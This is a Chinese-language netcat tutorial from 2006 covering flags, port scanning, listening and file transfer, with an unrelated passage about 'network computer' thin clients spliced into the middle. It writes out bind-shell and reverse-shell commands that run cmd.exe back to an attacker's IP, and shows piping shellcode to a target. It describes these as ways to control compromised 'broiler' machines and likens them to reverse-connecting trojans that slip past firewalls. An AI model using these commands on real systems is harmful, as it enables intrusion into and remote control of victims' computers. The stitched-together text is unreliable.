nc(瑞士军刀)的详细使用 
 
作者：admin 文章来源：本站原创 点击数：1865 更新时间：2006-1-22 0:56:13  
 
netcat被誉为网络安全界的'瑞士军刀'，相信没有什么人不认识它吧...... 
一个简单而有用的工具，透过使用TCP或UDP协议的网络连接去读写数据。它被设计成一个稳定的后门工具， 
能够直接由其它程序和脚本轻松驱动。同时，它也是一个功能强大的网络调试和探测工具，能够建立你需要的几 
乎所有类型的网络连接，还有几个很有意思的内置功能(详情请看下面的使用方法)。 
在中国，它的WINDOWS版有两个版本，一个是原创者Chris Wysopal写的原版本，另一个是由'红与黑'编译 
后的新'浓缩'版。'浓缩'版的主程序只有10多KB（10多KB的NC是不能完成下面所说的第4、第5种使用方法， 
有此功能的原版NC好象要60KB：P），虽然"体积"小，但很完成很多工作。 
<!--StartFragment-->=====================================================================================================
软件介绍：

工具名：Netcat
作者：Hobbit && Chris Wysopal
网址：http://www.atstake.com/research/tools/network_utilities/
类别：开放源码
平台：Linux/BSD/Unix/Windows 
WINDOWS下版本号：[v1.10 NT]

=====================================================================================================
参数介绍：

'nc.exe -h'即可看到各参数的使用方法。
基本格式：nc [-options] hostname port[s] [ports] ...
nc -l -p port [options] [hostname] [port]

-d 后台模式
-e prog 程序重定向，一旦连接，就执行 [危险!!]
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h 帮助信息
-i secs 延时的间隔
-l 监听模式，用于入站连接
-L 连接关闭后,仍然继续监听
-n 指定数字的IP地址，不能用hostname
-o file 记录16进制的传输
-p port 本地端口号
-r 随机本地及远程端口
-s addr 本地源地址
-t 使用TELNET交互方式
-u UDP模式
-v 详细输出--用两个-v可得到更详细的内容
-w secs timeout的时间
-z 将输入输出关掉--用于扫描时

端口的表示方法可写为M-N的范围格式。


=====================================================================================================
基本用法：

大概有以下几种用法：

1)连接到REMOTE主机，例子：
格式：nc -nvv 192.168.x.x 80
讲解：连到192.168.x.x的TCP80端口


2)监听LOCAL主机，例子：
格式：nc -l -p 80
讲解：监听本机的TCP80端口


3)扫描远程主机，例子：
格式：nc -nvv -w2 -z 192.168.x.x 80-445
讲解：扫描192.168.x.x的TCP80到TCP445的所有端口


4)REMOTE主机绑定SHELL，例子：
格式：nc -l -p 5354 -t -e c:\winnt\system32\cmd.exe
讲解：绑定REMOTE主机的CMDSHELL在REMOTE主机的TCP5354端口


5)REMOTE主机绑定SHELL并反向连接，例子：
格式：nc -t -e c:\winnt\system32\cmd.exe 192.168.x.x 5354
讲解：绑定REMOTE主机的CMDSHELL并反向连接到192.168.x.x的TCP5354端口


以上为最基本的几种用法（其实NC的用法还有很多，
当配合管道命令"|"与重定向命令"<"、">"等等命令功能更强大......）。

=====================================================================================================
高级用法：

6)作攻击程序用，例子：
格式1：type.exe c:\exploit.txt|nc -nvv 192.168.x.x 80
格式2：nc -nvv 192.168.x.x 80 < c:\exploit.txt
讲解：连接到192.168.x.x的80端口，并在其管道中发送'c:\exploit.txt'的内容(两种格式确有相同的效果，
真是有异曲同工之妙:P)

附：'c:\exploit.txt'为shellcode等


7)作蜜罐用[1]，例子：
格式：nc -L -p 80
讲解：使用'-L'(注意L是大写)可以不停地监听某一个端口，直到ctrl+c为止


8)作蜜罐用[2]，例子：
格式：nc -L -p 80 > c:\log.txt
讲解：使用'-L'可以不停地监听某一个端口，直到ctrl+c为止，同时把结果输出到'c:\log.txt'中，如果把'>'
改为'>>'即可以追加日志

附：'c:\log.txt'为日志等


9)作蜜罐用[3]，例子：
格式1：nc -L -p 80 < c:\honeypot.txt
格式2：type.exe c:\honeypot.txt|nc -L -p 80
讲解：使用'-L'可以不停地监听某一个端口，直到ctrl+c为止，并把'c:\honeypot.txt'的内容'送'入其
管道中
(2)

NC有几种工作模式？

l WBT模式

　　应用程序运行在服务器上，NC作为终端使用，可基本上解决和Windows 应用软件的兼容问题。通过在Windows NT/2000服务器上运行Windows应用程序，在NC上运行RDP客户程序，其使用效果和在本地运行相似，一个扩大内存的普通PC服务器就可以支持数十台NC。

l XDTerminal (XD终端)模式

　　应用程序运行在Unix服务器上，NC作为终端使用，XDTerminal可以使用Unix（包括Linux）服务器的某些应用程序。

l B/S（浏览器/服务器）模式

　　在NC上运行浏览器与服务器协同工作，处理能力由服务器和NC分担。B/S模式是应用软件的发展趋势，其性能主要决定于网络和服务器，在这种模式下使用NC与PC的效果几乎没有差别。各NC都通过网络公共出口联接Intent，这与PC用Modem分别联接Intent相比，既经济又安全。

l Linux本地机模式

　　Linux应用程序可以通过远程加载在NC本地运行，服务器提供文件存储。随着知识产权保护的强化采用Linux应用软件将使软件成本大大降低。打印可由网络或本地支持。
下载地址：http://www.eee110.com/Software/Catalog139/169.html
命令1：监听命令
nc -l -p port
nc -l -p port > e:/log.dat
nc -l -v -p port
参数解释：
-l：监听端口，监听入站信息
-p：后跟本地端口号
-v：显示端口的信息，如果使用-vv的话，则会显示端口更详细的信息
提示：一般大家都爱用-vv
nc -l -p 80
这个很简单，监听80端口
如果机器上运行这个命令，端口80被认为是开放的，可以欺骗很多扫描器的哦！
nc -l -p 80 > e:/log.dat
呵呵，功能和上边一样，但是后边加了个“> e:/log.dat”我想，学过ECHO
那个命令的人都会知道吧，是在E盘创建一个log.dat的日志文件
nc -l -v -p 80
和上边命令相似，不过这次不是记录在文件里，而是会直接显示在运行着NC
的屏幕上。
nc -l -v -p 80
然后在浏览器中输入本机IP：127.0.0.1
同样，上边两个也是一样，大家自己试验一下吧
命令2：程序定向
nc -l -p port -t -e cmd.exe
本地机： nc -l -p port 或 nc -l -v -p port
目标机：nc -e cmd.exe ip port
参数解释：
-l、-p两个参数已经解释过了
-e；作用就是程序定向
-t：以telnet的形式来应答
例子
nc -l -p 5277 -t -e cmd.exe
知道运行在哪里吗？千万不要运行在自己的机器上，如果运行了，你机器
就会变成一台TELNET的服务器了，呵呵，解释一下：监听本地端口5277的
入站信息，同时将CMD.exe这个程序，重定向到端口5277上，当有人连接的时候，就让程序CMD.exe以TELNET的形式来响应连接要求。
说白了，其实就是让他成为一台TELNET的肉鸡，所以这个命令要运行在你的肉鸡上。。
呵呵，咱们来找台肉鸡试试，我TELNET IP 5277
local machine：nc -l -p port ( or nc -l -v -p port )
remote machine：nc -e cmd.exe ip port
大家知道灰鸽子和神偷吧，这两款工具都是利用了反弹端口型的木马，
什么叫反弹端口？就是说，当对方中马后，不用你主动和对方连接，也就是说
不用从你的client端向对方主机上运行的server端发送请求连接，而是对方主动来连接你
这样就可以使很多防火墙失效，因为很多防火墙都不检查出站请求的。
这里这两个命令结合在一起后，于那两款木马可以说有异曲同工之效。为什么？
咳！！听我给你讲啊！！（先交100000000RMB学费)哇，别杀我啊！！)
nc -l -p 5277 （坚听本地5277端口）
同样也可以用
nc -l -v -p 5277
运行在本地
然后在远程机器上，想办法运行
nc -e cmd.exe ip 5277
（你可别真的打“ip”在肉机上啊）要打，xxx.xxx.xxx.xxx这样！！
呵，看看在本地机器上出现了什么？
这样就是反弹~~在本地机器上得到了一个SHELL
命令3：扫描端口
nc -v ip port
nc -v -z ip port-port
nc -v -z -u ip port-port
参数解释：
-z：将输入输出关掉，在扫描时使用
nc -v ip port
这个命令是针对某一个端口进行扫描
例如：
nc -v ip 135
扫描远程主机的135端口，这样获得了该端口的一些简单信息，但是针对某些端口，我们还可以获得更多的信息
例如：80端口
我们可以使用nc -v ip 80 然后使用get方法来获得对方的WEB服务器的信息
nc -v -z ip port-port
这个命令是用来扫描的一个命令，这个命令用于快速扫描TCP端口，而port-port则是指定了扫描的端口范围
例如：
nc -v -z ip 1-200
可以看到我机器上的1-200的TCP端口的开放情况
nc -v -z -u ip port-port
这个命令比上个命令多了个-u，这个命令的作用仍然是扫描端口，只是多了一个-u的参数，是用来扫UDP端口的
例如：
nc -v -z -u ip 1-200
这个命令就会扫1-200的UDP端口
命令4：传送文件（HOHO，I LIKE）
LOCAL MACHINE：nc -v -n ip port < x:/svr.exe
REMOTE MACHINE：nc -v -l -p port > y:/svr.exe
参数解释：
-n：指定数字的IP地址
这两个命令结合起来是用来传送文件的
首先，在远程机上运行命令：
nc -v -l -p 5277 > c:/pulist.exe
这个命令还记的吗？呵呵，是不是和监听命令有点类似，对，没错，这个是监听5277端口
并把接受到的信息数据写到c:/pulist.exe中
这时候在本地机上运行
nc -v -n ip 5277 < e:/hack/pulist.exe
这个命令的意思就是，从本地E盘跟目录中读取pulist.exe文件的内容，并把这些数据发送到ip的5277端口上
这样远程主机就会自动创建一个pulist.exe文件

 
